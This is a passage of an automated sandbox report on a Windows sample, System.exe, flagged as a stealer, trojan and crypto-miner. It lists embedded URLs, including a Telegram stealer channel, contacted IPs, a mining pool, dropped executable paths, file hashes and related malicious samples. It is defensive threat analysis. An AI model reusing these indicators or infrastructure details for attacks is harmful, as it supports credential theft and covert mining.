              http://crl.rootca1.amazontrust.com/rootca1.crl0System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://crl.pki.goog/gtsr1/gtsr1.crl0WSystem.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://ocsp.rootca1.amazontrust.com0:System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://icanhazip.compZSystem.exe, 00000000.00000002.295340608074.00000176905CF000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://t.me/FleshStealerpZSystem.exe, 00000000.00000002.295340608074.00000176905CF000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://pki.goog/repository/0System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.ecosia.org/newtab/System.exe, 00000000.00000002.295346194625.00000176A0809000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A07E8000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://pki.goog/repo/certs/gtsr1.der04System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://ac.ecosia.org/autocomplete?q=System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.google.comSystem.exe, 00000000.00000002.295340608074.0000017690547000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.google.com/images/branding/product/ico/googleg_alldp.icoSystem.exe, 00000000.00000002.295346194625.00000176A0809000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A07E8000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=System.exe, 00000000.00000002.295346194625.00000176A0809000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A07E8000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08CC000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A04AE000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://x1.c.lencr.org/0System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://x1.i.lencr.org/0System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://crt.rootca1.amazontrust.com/rootca1.cer0?System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.quovadis.bm0System.exe, 00000000.00000002.295354346638.00000176A8B82000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://icanhazip.comSystem.exe, 00000000.00000002.295340608074.00000176905CF000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.00000176905DD000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://ocsp.quovadisoffshore.com0System.exe, 00000000.00000002.295354346638.00000176A8B82000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSystem.exe, 00000000.00000002.295340608074.0000017690481000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://gemini.google.com/app?q=System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              191.101.104.168
              		utka.xyzChile
              		61317ASDETUKhttpwwwheficedcomGBtrue
              89.23.100.233
              		unknownRussian Federation
              		48687MAXITEL-ASRUfalse
              104.16.185.241
              		icanhazip.comUnited States
              		13335CLOUDFLARENETUSfalse
              142.202.242.43
              		unknownReserved
              		143151GSERVERSUSfalse

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1512274
              Start date and time:2024-09-17 03:57:37 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 10m 50s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
              Run name:Suspected VM Detection
              Number of analysed new started processes analysed:66
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:System.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.mine.winEXE@99/15@4/4
              EGA Information:
              • Successful, ratio: 60%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Execution Graph export aborted for target System.exe, PID 6804 because it is empty
              • Execution Graph export aborted for target svchost.exe, PID 6376 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              03:59:31Task SchedulerRun new task: {D0BB1C9B-B0D4-43DE-99F0-835302AFCDA1} path: .
              21:59:51API Interceptor22x Sleep call for process: powershell.exe modified
              21:59:57API Interceptor64x Sleep call for process: System.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              89.23.100.233SecuriteInfo.com.Trojan.PWS.Siggen3.38160.4541.30793.exeGet hashmaliciousUnknownBrowse
                104.16.185.241Quotation.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                • icanhazip.com/
                client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                • icanhazip.com/
                Request for Quotation_1.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                • icanhazip.com/
                out.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                • icanhazip.com/
                BTC.exeGet hashmaliciousAsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWormBrowse
                • icanhazip.com/
                Client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                • icanhazip.com/
                SecuriteInfo.com.MSIL.MassLogger-G.1448.1172.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                • icanhazip.com/
                22.08.2024.exeGet hashmaliciousXmrigBrowse
                • icanhazip.com/
                vYz1Z2heor.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                • icanhazip.com/
                WinRAR 7.01 Pro.exeGet hashmaliciousPureLog Stealer, WorldWind StealerBrowse
                • icanhazip.com/
                142.202.242.4308OyZEWGbf.exeGet hashmaliciousXmrigBrowse
                  zTMEFv0Dh3.exeGet hashmaliciousXmrigBrowse
                    file.exeGet hashmaliciousXmrigBrowse
                      http://5.42.66.10/download/123p.exeGet hashmaliciousXmrigBrowse
                        SecuriteInfo.com.Trojan.Siggen27.52043.15111.6134.exeGet hashmaliciousXmrigBrowse
                          VTbtz4ZUY6.exeGet hashmaliciousXmrigBrowse
                            SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exeGet hashmaliciousXmrigBrowse
                              gQZvXi6Osc.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                zLAr8hkDsu.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                  hacn.exeGet hashmaliciousDiscord Token Stealer, Millenuim RAT, XmrigBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    pool.hashvault.proUpdate.exeGet hashmaliciousBlank Grabber, Redline Clipper, XmrigBrowse
                                    • 45.76.89.70
                                    66dd2c2d3b88f_opera.exeGet hashmaliciousXmrigBrowse
                                    • 95.179.241.203
                                    04cde81ac938706771fa9fe936ee8f79fe7e079973098.exeGet hashmaliciousRedLine, XmrigBrowse
                                    • 142.202.242.43
                                    file.exeGet hashmaliciousXmrigBrowse
                                    • 45.76.89.70
                                    3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                                    • 95.179.241.203
                                    file.exeGet hashmaliciousXmrigBrowse
                                    • 95.179.241.203
                                    gutpOKDunr.exeGet hashmaliciousXmrigBrowse
                                    • 45.76.89.70
                                    284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exeGet hashmaliciousAmadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                    • 45.76.89.70
                                    file.exeGet hashmaliciousXmrigBrowse
                                    • 45.76.89.70
                                    icanhazip.comQuotation.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                    • 104.16.185.241
                                    Purchase Order . September Deelivery.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                    • 104.16.184.241
                                    client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                    • 104.16.185.241
                                    SecuriteInfo.com.Trojan.PWS.Siggen3.38160.4541.30793.exeGet hashmaliciousUnknownBrowse
                                    • 104.16.184.241
                                    Enquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                    • 104.16.184.241
                                    Demande de devis.Quote Request.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                    • 104.16.184.241
                                    Request for Quotation_1.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                    • 104.16.185.241
                                    out.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                    • 104.16.185.241
                                    BTC.exeGet hashmaliciousAsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWormBrowse
                                    • 104.16.185.241
                                    client2.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                    • 104.16.184.241

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUSstub.exeGet hashmaliciousAsyncRATBrowse
                                    • 104.20.3.235
                                    http://labas.strangled.net/4xlMao16093JIbJ312aadmbkfqrz1266UHCJRSURCEGATYD6989IRKO27529L14Get hashmaliciousPhisherBrowse
                                    • 188.114.96.3
                                    Play_VM-Now(Imb)DLOWQ.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 104.17.25.14
                                    https://www.rashakhodro.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWJ6RkxWV3c9JnVpZD1VU0VSMTUwOTIwMjRVMTUwOTE1NDQ=N0123Ninfo@colemanenv.comGet hashmaliciousUnknownBrowse
                                    • 104.17.24.14
                                    Viccccc9.htmGet hashmaliciousHTMLPhisherBrowse
                                    • 104.17.25.14
                                    http://renewmynetflix.com/Get hashmaliciousUnknownBrowse
                                    • 172.64.155.119
                                    https://arvestrewardscard.embarkdigitalonboarding.com/Get hashmaliciousUnknownBrowse
                                    • 104.17.247.203
                                    http://orange-bush-8b8d.nruteeenagee5421.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                    • 104.21.64.56
                                    http://moodys-local.comGet hashmaliciousUnknownBrowse
                                    • 172.67.74.152
                                    https://sharepoint.intopics.com/Get hashmaliciousUnknownBrowse
                                    • 104.17.24.14
                                    ASDETUKhttpwwwheficedcomGBfile_5822aee2333945a68f99cf2cfdd0e024_2024-09-16_14_28_33_034000.zipGet hashmaliciousUnknownBrowse
                                    • 181.214.165.162
                                    https://pancake.swap-web3.xyz/Get hashmaliciousUnknownBrowse
                                    • 191.101.79.169
                                    Benefit_Signature_Plan#3762.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 102.165.14.28
                                    https://ibafhfg.r.af.d.sendibt2.com/tr/cl/ei-iIasDUfhajlha_L_PYwmEV0TXG-pmymM0mqP6wJ8jqUBnRevpHf8umV1Cxk0P5A0G7qvQoF39O-oYwRH3RCdSdtx1Y0b_2sg_iXOax_tFc1XZBC3EPtztmZF7qOstNWb2r9nSAsjPU6qj2F8Gg64Ba0d6xBjSEwUcsnsTYaQjAxsh52QvEBY0E7yDJkW8hVMf4Z-UgTv6SrNDoDPMdYdSSvXdtLzPyBKNyGRyOKbA6kM2yCjc-39_2GjmQrGc8IG-6EqDH4Ly9S8KIsAGet hashmaliciousUnknownBrowse
                                    • 45.67.217.193
                                    https://go.skimresources.com/?id=129857X1500501&url=https://www.freelansssssssssssssssscer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://kiguran.com/cli/5373536720/YWdpYW5jYXJsb0BtYXllcmJyb3duLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                    • 191.101.232.230
                                    http://masdd.line.pm/Get hashmaliciousUnknownBrowse
                                    • 108.165.254.60
                                    WqSryO4Ykn.exeGet hashmaliciousUnknownBrowse
                                    • 102.165.14.139
                                    http://warinice.ac.th/h/d/Get hashmaliciousUnknownBrowse
                                    • 102.165.14.4
                                    https://www.sitechile.cl/assets/Get hashmaliciousUnknownBrowse
                                    • 191.101.104.152
                                    mirai.ppc.elfGet hashmaliciousMiraiBrowse
                                    • 191.108.164.179
                                    MAXITEL-ASRUSecuriteInfo.com.Trojan.PWS.Siggen3.38160.4541.30793.exeGet hashmaliciousUnknownBrowse
                                    • 89.23.100.233
                                    tjigfd64.exeGet hashmaliciousLummaC StealerBrowse
                                    • 94.158.209.5
                                    3plugin29563.exeGet hashmaliciousAmadeyBrowse
                                    • 89.23.103.42
                                    setup.exeGet hashmaliciousRedLineBrowse
                                    • 89.23.97.185
                                    http://go.tenoaksadvisors.com.Get hashmaliciousUnknownBrowse
                                    • 89.23.110.52
                                    TYg9Jx5SUa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 89.23.100.125
                                    http://www.trailhopper.com.au/Get hashmaliciousUnknownBrowse
                                    • 89.23.110.52
                                    https://ximasoftware.com/ehr-emr-integrationGet hashmaliciousUnknownBrowse
                                    • 89.23.110.52
                                    https://tonaquint.com/Get hashmaliciousUnknownBrowse
                                    • 89.23.110.52
                                    http://www.lapumpandvalve.comGet hashmaliciousUnknownBrowse
                                    • 89.23.110.52
                                    1GSERVERSUS2BuZaUic3i.exeGet hashmaliciousRedLineBrowse
                                    • 207.32.219.79
                                    EpCrfIUgyF.exeGet hashmaliciousRedLineBrowse
                                    • 207.32.219.79
                                    04cde81ac938706771fa9fe936ee8f79fe7e079973098.exeGet hashmaliciousRedLine, XmrigBrowse
                                    • 142.202.242.45
                                    Facturation.exeGet hashmaliciousDoeneriumBrowse
                                    • 104.251.123.67
                                    SpelQ3Xvt7.exeGet hashmaliciousAveMaria, UACMeBrowse
                                    • 142.202.242.177
                                    http://khalidhost.loseyourip.com:777/dddd.mp4Get hashmaliciousUnknownBrowse
                                    • 207.32.217.25
                                    http://khalidhost.loseyourip.com:777/dddd.mp4Get hashmaliciousUnknownBrowse
                                    • 207.32.217.25
                                    arm4-20240706-0012.elfGet hashmaliciousMiraiBrowse
                                    • 207.32.216.16
                                    08OyZEWGbf.exeGet hashmaliciousXmrigBrowse
                                    • 142.202.242.43
                                    D9yWJTtsiS.exeGet hashmaliciousAmadey, XmrigBrowse
                                    • 142.202.242.45

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0ehttps://es-correes.top/es/Get hashmaliciousUnknownBrowse
                                    • 191.101.104.168
                                    https://sharepoint.intopics.com/Get hashmaliciousUnknownBrowse
                                    • 191.101.104.168
                                    https://20091578-get-to.pages.dev/robots.txt/Get hashmaliciousUnknownBrowse
                                    • 191.101.104.168
                                    http://web.telagram.vip/Get hashmaliciousUnknownBrowse
                                    • 191.101.104.168
                                    https://leverkusene-f79d83.ingress-bonde.ewp.live/wp-content/plugins/krediet/pages/region.phpGet hashmaliciousUnknownBrowse
                                    • 191.101.104.168
                                    https://spikeclaimweb.pages.dev/index_3.html/Get hashmaliciousUnknownBrowse
                                    • 191.101.104.168
                                    https://mjj.aigc369.com/Get hashmaliciousUnknownBrowse
                                    • 191.101.104.168
                                    https://sharepoint.intopics.com/robots.txtGet hashmaliciousUnknownBrowse
                                    • 191.101.104.168
                                    http://login.microsoft.com.sec-lab.site/Get hashmaliciousUnknownBrowse
                                    • 191.101.104.168

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeSj6RXNl1qf.exeGet hashmaliciousRedLineBrowse
                                      Sj6RXNl1qf.exeGet hashmaliciousRedLineBrowse
                                        Bypasss.exeGet hashmaliciousUnknownBrowse
                                          Bypasss.exeGet hashmaliciousUnknownBrowse
                                            C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeSj6RXNl1qf.exeGet hashmaliciousRedLineBrowse
                                              Sj6RXNl1qf.exeGet hashmaliciousRedLineBrowse
                                                Bypasss.exeGet hashmaliciousUnknownBrowse
                                                  Bypasss.exeGet hashmaliciousUnknownBrowse

                                                    Created / dropped Files

                                                    C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):2660352
                                                    Entropy (8bit):6.547190613352591
                                                    Encrypted:false
                                                    SSDEEP:49152:0oHeAmEkEH3Kp1uSm2kQqKbo7Oep/IOOQNMXNvsW0RWlves17n:THeAmEenbGOep/ra9TaWlve8b
                                                    MD5:B0601C9443DD3B7A6B02EE764791C9AD
                                                    SHA1:8ED01F29022CE752408BAE7FF961EDC06872413A
                                                    SHA-256:52C8C92F79183A354C5EE59653426B0F97209C37EEC39FE5077EF43666EAF8A1
                                                    SHA-512:130DAC47EB656F37F0A0DF20C193768590788279E785FDA9D7A92717CECAAE9CB57C4A4740060265E83154C9D853BB952DA1A2AF0D1A9FB355B1DA0AAA8B9A9C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Virustotal, Detection: 81%, Browse
                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                    Joe Sandbox View:
                                                    • Filename: Sj6RXNl1qf.exe, Detection: malicious, Browse
                                                    • Filename: Sj6RXNl1qf.exe, Detection: malicious, Browse
                                                    • Filename: Bypasss.exe, Detection: malicious, Browse
                                                    • Filename: Bypasss.exe, Detection: malicious, Browse
                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Cf.........."...........(.....@..........@..............................)...........`....................................................<.....(.0.....(...............).x...............................(.......8...............X............................text...v........................... ..`.rdata..< ......."..................@..@.data.....'.......'.................@....pdata........(.......(.............@..@.00cfg........(.......(.............@..@.tls..........(.......(.............@....rsrc...0.....(.......(.............@..@.reloc..x.....).......(.............@..B........................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\System.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1588
                                                    Entropy (8bit):5.364246901670718
                                                    Encrypted:false
                                                    SSDEEP:48:MxHKo1qHGv3QqCYHKG1AoPtHTJW1hAHKKyEHqJHUHKr:iqowmBCYqG1AoPtzJceqKb00qr
                                                    MD5:805C4740A7E858B0BFEBFA370871F60E
                                                    SHA1:DA749D867A11B10E1932F1CF31FD4C57D8E7DBBD
                                                    SHA-256:E26F522C72871D0A03E74909558F16FCB160555AC92E6D6B8D375ACE08247C24
                                                    SHA-512:564E301D0E127E9A6B4BEB4EDA9EFA287D82C277C057F4FD88DAD818F83E212603A57A690CBF10CD16B8AF8DD70215AEF4EC1106957E078DF532D98650948235
                                                    Malicious:true
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\4dac268a38ead99f93898a086bb8c6f6\System.Drawing.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\26c7945a20d57e805a32145c8bd1f4f7\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
